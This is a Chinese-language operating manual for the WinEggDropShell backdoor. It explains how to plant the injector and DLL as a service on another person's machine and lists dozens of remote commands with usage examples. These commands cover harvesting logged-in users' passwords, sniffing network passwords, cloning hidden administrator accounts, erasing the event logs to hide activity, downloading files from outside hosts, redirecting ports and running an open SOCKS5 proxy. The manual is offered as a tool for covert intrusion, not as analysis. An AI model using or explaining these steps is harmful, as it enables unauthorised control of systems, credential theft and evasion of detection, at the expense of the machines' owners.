程序说明:一个扩展型的telnet后门程序

特点:
1.比较小型，除了用汇编写外，同样功能，同样质量和同类型的后门程序，不怎么可能会写得比这
个更小的了。
2.有其它同类型后门程序(推出比这个早的同类型后门)没有的功能,如clone(克隆帐户),installterm
(安装终端服务),fport(这个不太肯定，据闻红盟那个hgod什么的也有这功能),sid,控制台模式的
注册表操作,Sock5代理等等功能.
3.完善的在线帮助,对于带参数命令，如果忘记语法，只要输入那个命令，就可以看到用法和一个
例子.
自己使用过后，才可以清楚感受到这后门程序的特色以及和其它后门程序间的分别。

特别声明:使用前请将说明文件看明白。

Private Version功能
1.Pslist 功能说明:显示进程
2.ListIP 功能说明:显示系统所有IP和域名
3.ShowSID 功能说明:显示所有系统帐户的SID(读注册表中sam下的值得到)
4.Fport 功能说明:进程打开的端口列表
5.Online 功能说明:列出所有连接进去这个后门的用户的IP
6.WhoIsShell 功能说明:列出哪个IP得到一个shell
7.ShowName 功能说明:显示所有系统帐户(通过读注册表,可以显示到隐藏帐户)
8.Reboot 功能说明:重启那台系统
9.ShutDown 功能说明:关闭那台系统
10.Logoff 功能说明:注销登陆了的帐户
11.PowerOff 功能说明:关那系统电源
12.Shell 功能说明:得到一个Shell
13.Stopbackdoor 功能说明:停止wineggdropshell服务
14.pskill 功能说明:杀进程
15.Never 功能说明:设置某个帐户使其的登陆时间被改为从
无登陆以及登录次数为0.
16.DirFile 功能说明:显示当前目录文件
17.DelFile 功能说明:删除文件
18.Execute 功能说明:执行程序
19.Http://IP/文件 功能说明:下载文件
20.Installterm 功能说明:安装终端服务
21.Clone 功能说明:克隆一个系统帐户
22.Send 功能说明:给其它连接上wineggdropshell的用户发信息
23.Exit 功能说明:断开连接
24.OffShell 功能说明:将得到Shell的用户踢下去
25.Help 功能说明:显示命令说明
26.Disconnect 功能说明:将其它用户踢下线去
27.StopService 功能说明:停止系统的某个服务
28.StartService 功能说明:启动系统某个服务
29.DeleteService 功能说明:删除系统某个服务
30.CleanEvent 功能说明:清除系统日志
31.TerminalPort 功能说明:查看或重新设置终端服务端口
32.Redirect 功能说明:TCP数据转发
33.ViewThreads 功能说明:查看TCP数据转发打开的线程
34.KillThreads 功能说明:杀掉某个TCP数据转发的线程
35.EnableFilter 功能说明:激活TCP/IP过滤
36.DisableFilter 功能说明:禁止TCP/IP过滤
37.FilterInfo 功能说明:查看TCP/IP过滤是处于激活还是禁止状态
38.AR 功能说明:恢复系统几个常用的关联的设置
39.GetUser 功能说明:列举系统所有帐户
40.ViewPath 功能说明:查看当前目录
41.SetPath 功能说明:设置当前目录
42.SID 功能说明:查看本地或远程系统帐户的SID
43.ViewTimeOut 功能说明:查看超时秒数
44.SetTimeOut 功能说明:设置超时秒数
45.StartSniffer 功能说明:启动嗅觉密码功能
46.StopSniffer 功能说明:停止嗅觉功能
47.ViewSniffer 功能说明:查看嗅觉密码功能是否在进行
48.Sysinfo 功能说明:查看系统的信息
49.ViewService 功能说明:查看某个服务的状态
50.ConfigService 功能说明:修改某个服务的启动状态
51.ViewKey 功能说明:查看run和runservices所有的项
52.DelKey 功能说明:删除run和runservices中的一个启动项
53.EnumService 功能说明:列举所有自动启动的服务的资料
54.RegEedit 功能说明:进入注册表操作模式
55.Findpassword 功能说明:得到所有当前登陆上系统的用户的密码
56.ExitShell 功能说明:在cmd的shell下返回到[Melody]模式
57.StartProxy 功能说明:启动Sock5代理
58.StopProxy 功能说明:停止Sock5代理
59.ViewProxyInfo 功能说明:查看Sock5代理信息


在使用程序前先看下面的说明:
1.先配置好InjectT.exe,然后将InjectT.exe和那个TBack.Dll上载到其它系统的winnt\system32下，
然后执行
InjectT.exe -run (安装为服务并且执行)


以下命令是当你用Telnet连接上WinEggDropShell后门并成功通过验证到达[Melody]模式使用的命令:
V1.50命令如下
1.pslist 功能：显示系统进程
用法:pslist

2.ListIP 功能:显示系统所有IP(外部，内部IP和电脑名等)
用法:ListIP

3.ShowSID 功能:显示系统帐户的SID
用法:ShowSID

4.ShowName 功能:显示系统所有帐户(不同于getuser,可以得到一些"隐藏"的帐户)
用法:ShowName

5.Fport 功能:进程到端口列表
用法:Fport

6.Online 功能:显示连接上wineggdropshell的用户的IP以及使用的Thread
用法:Online

7.WhoIsShell 功能:显示哪个IP正在使用Shell
用法:WhoIsShell

8.Reboot 功能:重启系统
用法:Reboot

9.ShutDown 功能:关闭系统
用法:ShutDown

10.Logoff 功能:注销登陆了的系统用户
用法:Logoff

11.PowerOff 功能:关闭电源
用法:PowerOff

12.Shell 功能:得到一个Cmd Shell
用法:Shell

13.Stopbackdoor 功能:停止WinEggDropShell服务(此功能在V1.38版本被禁止)
用法:Stopbackdoor

14.Help 功能:显示所有命令帮助
用法:Help 

15.Exit 功能:断开连接
用法:Exit

16.Pskill PID或程序名 功能:杀进程
用法:pskill 1234
用法:pskill notepad

17.Never 用户名 功能:更改某个用户的设定，使它的登陆次数变为0以及从没有登陆上系统
用法:Never Guest
用法:Never Administrator

18.DirFile 文件名 功能:显示当前目录的文件，支持通配符
用法:DirFile *.exe

19.DelFile 文件名 功能:删除当前目录的一个文件,不支持通配符
用法: DelFile a.txt

20.Execute 程序 功能:在后台中执行程序
用法:Execute abc.exe
用法:Execute net.exe user test test
注意:要执行的程序要加扩展名，否则可能不会执行成功.

21.http://ip/文件名 保存文件名 功能:下载程序
用法:http://11.11.11.11/a.exe a.exe
用法:http://www.mysite.com/a.exe a.exe

22.Installterm 端口 功能:在没有安装终端服务的win 2k服务版的系统中安装终端服务，重启系统后才生效.
用法:Installterm 3345 (重启后终端会打开3345那个端口,使用此命令前先看看你要定义的终端的端口是否被
其它程序所用)

23.Clone 帐户 要克隆的帐户 密码 功能:克隆一个帐户
用法:Clone Admin Guest test
上面用法会效Guest克隆到Admin那个用户中，并且Guest的密码被改为test

24.Send All 信息 功能:给其它登陆上wineggdropshell的用户发信息
用法:Send all 你好

25.OffShell 功能:将得到Shell的用户踢下去
用法:OffShell

26.Disconnect 功能:将其它用户(不管是否是得到shell)踢下线
用法:Disconnect ThreadNumber ->将某个用户踢下去
用法:Disconnect All ->将所有用户踢下去，除你自己外
注意:如何得到ThreadNumber呢?如果你使用Online这个命令(上面命令列表的第6个命令),你就可以得到
所有登陆了的用户的ThreadNumber.

27.StopService 功能:停止系统的某个服务
用法:StopService 服务名
例子:StopService w3svc(将IIS服务停止)

28.StartService 功能:启动系统某个服务
用法:StartService 服务名
例子:StartService w3svc(启动IIS服务)

29.DeleteService 功能:删除系统某个服务
用法:DeleteService 服务名
注意:一般在删除一个服务前要要将那个服务停止的，但因为有些服务对net stop是没有响应的，所以
只能是直接删除。当强行将一个正在运行的服务删除，服务还是在运行的，所以建议先使用stopservice
将服务停止，如果不能停止，那就另当别论.

30.CleanEvent 功能:删除系统日志
用法:CleanEvent
会将系统的Application,Security以及System的日志全部删除

31.TerminalPort 功能:查看终端服务端口
用法:TerminalPort 

32.TerminalPort 新的端口 功能:重新设置终端服务端口
用法:TerminalPort 新的端口
注意:新端口必须是合法的端口,否则程序会返回错误。

33.Redirect 功能说明:TCP数据转发
用法:Redirect 端口 远程系统IP 远程端口
例子:Redirect 2222 12.12.12.12 3333 (这样任何连接到肉机2222端口的TCP数据都会转发到
12.12.12.12这个IP的端口3333中去)
例子:Redirect 2222 www.abc.com 3333 (这样任何连接到肉机2222端口的TCP数据都会转发到
www.abc.com的端口3333中去)

34.ViewThreads 功能说明:查看TCP数据转发打开的线程
用法:ViewThreads 

35.KillThreads 功能说明:杀掉某个TCP数据转发的线程
用法:KillThreads 线程号
注:这里的线程号是通过用ViewThreads看到的

36.EnableFilter 功能说明:激活TCP/IP过滤
用法:EnableFilter

37.DisableFilter 功能说明:禁止TCP/IP过滤
用法:DisableFilter

38.FilterInfo 功能说明:查看TCP/IP过滤是处于激活还是禁止状态
用法:FilterInfo

39.AR 功能说明:恢复系统几个常用的关联的设置
用法:AR

40.GetUser 功能说明:列举系统所有帐户
用法:GetUser

41.ViewPath 功能说明:查看当前目录
用法:ViewPath

42.SetPath 功能说明:设置当前目录
用法:SetPath 目录

43.SID 功能说明:查看本地或远程系统帐户的SID
用法:SID Local|IP
例子:SID Local (查看本地帐户的SID)
例子:SID IP (查看远程IP的帐户的SID,只有允许空连接，当会成功看到)

44.ViewTimeOut 功能说明:查看超时秒数
用法:ViewTimeOut

45.SetTimeOut 功能说明:设置超时秒数
用法:SetTimeOut 秒数

46.StartSniffer 功能说明:启动嗅觉密码功能
用法:StartSniffer NIC
例子:StartSniffer 0
注意:这里的NIC是网卡的号，很多系统有几个网卡的，所以你要有选择地选网卡进行
嗅觉，使用ListIP功能可以看到网卡对应的IP以及网卡号.结果会保存到Sniffer.dll
中去

47.StopSniffer 功能说明:停止嗅觉功能
用法:StopSniffer

48.ViewSniffer 功能说明:查看嗅觉密码功能是否在进行
用法:ViewSniffer

49.Sysinfo 功能说明:查看系统的信息
用法:Sysinfo

50.ViewService 功能说明:查看某个服务的状态
用法:ViewService ServiceName
例子:ViewService Norton Antivirus Server

51.ConfigService 功能说明:修改某个服务的启动状态
用法:ConfigService StartType ServiceName
例子:ConfigService Auto W3svc -->将IIS服务启动状态改为自动
例子:ConfigService Demand w3svc -->将IIS服务启动状态改为手动
例子:ConfigService Disable w3svc -->将IIS服务启动状态改为禁止
注意:上面参数中的StartType只可以是Auto,Demand,Disable中的其中一种，Auto代表自动，
Demand代表手动以及Disable代表禁止.

52.ViewKey 功能说明:查看run和runservices所有的项
用法:ViewKey

54.DelKey 功能说明:删除run和runservices中的一个启动项
用法:DelKey KeyName
例子1: DelKey radmm
例子2: DelKey Tk BellExe

53.EnumService 功能说明:列举所有自动启动的服务的资料
用法:EnumService

55.RegEdit 功能说明:进入注册表操作模式
用法:RegEdit
注意:如果你对于注册表并不熟悉(例如对注册表结构，数据类型等没有一个大概的认识的话，最
好就不要使用这个功能，特别是删除键或键值的功能。注册表中的数据是每重要的，修改
或删除一些重要的数据的话，很容易导致系统无法加载的，特别是后门是以服务启动的，
这样给了用户可以操作sam下数据的能力，所以不要乱用删除功能。
当输入RegEdit后，后门会从进入注册表的操作模式，你如果输入Help的话，会看到很多命令，这
些命令是当进入注册表操作模式后能起作用的，这些命令如下:

DirValue 功能说明:列出当前键下的所有项

DirKey 功能说明:列出当前的所有键

CD.. 功能说明:向后退一个键
例子:你现在是在hklm\software\microsoft下的话，输入cd..，那么当前你在注册表的位置就
会转到hklm\software下了。

Root 功能说明:退出注册表的根下
例子:无论你在注册表那个位置，输入root就会返回到hklm下

Exit 功能说明:退出注册表模式

Help 功能说明:输出帮助

CD KeyName 功能说明:进入某个键中去
例子:假设你正在在注册表中的hklm\software下，你输入cd microsoft,那么就会下入到hklm\software\microsoft
中去。

DelValue ValueName 功能说明:删除一个键值
例子:假设你是在hklm\software\microsoft下，这个键下有一项值是test,你输入
DelValue test,就会将test这个键值删除

DelKey KeyName 功能说明:删除一个键
例子:假设你在hklm\software\microsoft下，这个键下有一个键叫abc,你输入
DelKey abc,就会将abc整个键删除。(小心使用这个功能，因为会将整个键
删除，那个键下的键以及键值都会被删除)

Set Type ValueName Value 功能说明:增加一个键值
例子:假设你在hklm\software\microsoft\windows\currentversion\run下，你输入
Set REG_SZ test hook.exe,这样就会在run下生成一个test的键值，键值执行的程序是
hook.exe.
注意:这里的Type常用的只有几种，REG_SZ,REG_DWORD,REG_MUL_SZ,EG_EXPAND_SZ,当中以REG_SZ
最为常用。

55.Findpassword 功能说明:得到所有登陆用户的密码
用法:Findpassword

56.ExitShell 功能说明:在cmd的shell下返回到[Melody]模式
用法:ExitShell
注意:这命令是当用户得到一个cmd下的shell后，想退回到[Melody]那里去使用后门的命令时才使用.

57.StartProxy 功能说明:启动Sock5代理
用法: StartProxy [UserName] [Password] Port AllowedIP
说明: 
A.参数中的[UserName]和[Password]是可选项，如果没有的话，那就是无密码验证。
B.Port是代理打开的端口
C.AllowedIP是哪些IP是允许连接代理的，如果所有IP都可以连接，参数为All.
例子1: StartProxy 12345 All -->代理端口为12345,没有密码验证，所有IP都可以连
例子2: StartProxy Guest test 12345 All -->代理端口为12345,有密码验证，所有IP都可以连
例子3: StartProxy 12345 211.11.*.* -->代理端口为12345,没有密码验证，只有以211.11开头的IP可以连上代理。
例子4: StartProxy Abc abc 12345 12.12.*.* -->代理端口为12345,有密码验证，只有12.12开头的IP可以连上代理

58.StopProxy 功能说明:停止Sock5代理
用法: StopProxy
注意:当系统是NT 4.0时，使用此命令时会返回"Fail To Stop UDP Thread"的信息，其实是成功停
止了的，只是因为NT 4.0本身对某个API的返回的问题，所以会出现这个错误信息，但在win 2k
或xp是没有问题的。

59.ViewProxyInfo 功能说明:查看Sock5代理信息
用法:ViewProxyInfo


有必要加以说明的功能:
1.ExitShell
此功能主要是用于当用户成功得到一个Cmd下的shell后，想回到[Melody]模式下去继续使用命令
，就可以使用ExitShell直接切换会[Melody]模式，这样就方便用户不需要直接断开，然后再连
接上后门才可以到达[Melody]模式。

2.Cmd Redirector
此功能主要是方便用户在[Melody]模式下想运行一些系统本身命令或外部命令，但又不想直接进
入到cmd的shell所设，例如用户在[Melody]模式下想查看系统帐户Guest的一些信息，用户可以
直接在[Melody]模式下直接输入net user Guest,然后就可以看到Guest用户的信息了，当然用
户也可以直接进入到shell模式下去运行上面的命令。此功能基本上可以理解为一个模拟的Shell
,所不同的只是不需要多设置一个写的管道，而且因为后门程序只允许一个用户得到cmd下的Shell,
所以增加了这功能可以方便其他无法得到shell的用户使用此功能去得到一个模拟的Shell.

3.Sock5代理
Sock5代理是支持无密码和密码验证两种方式的，但由于局部网本身的限制问题，不借助第三方
程序是无法在udp协议的应用程序(oicq或其它在线游戏等)上使用sock5代理的，并且因为skservergui
那程序不支持我这个代理，所以暂时在局部网内用户在oicq等上要使用这个代理是有问题的，但
tcp协议的程序(icq,msn,yahoo messnger,irc等)是没有问题的,如果你使用这代理无法在局部网
上oicq的话，请不要问我为什么，上面的话已说得非常清楚了，如果不明白为什么udp协议的应用
程序在局部网内不借助第三方程序无法使用sock5代理连接，请自己查找有关udp协议和局部网相
关的资料查看。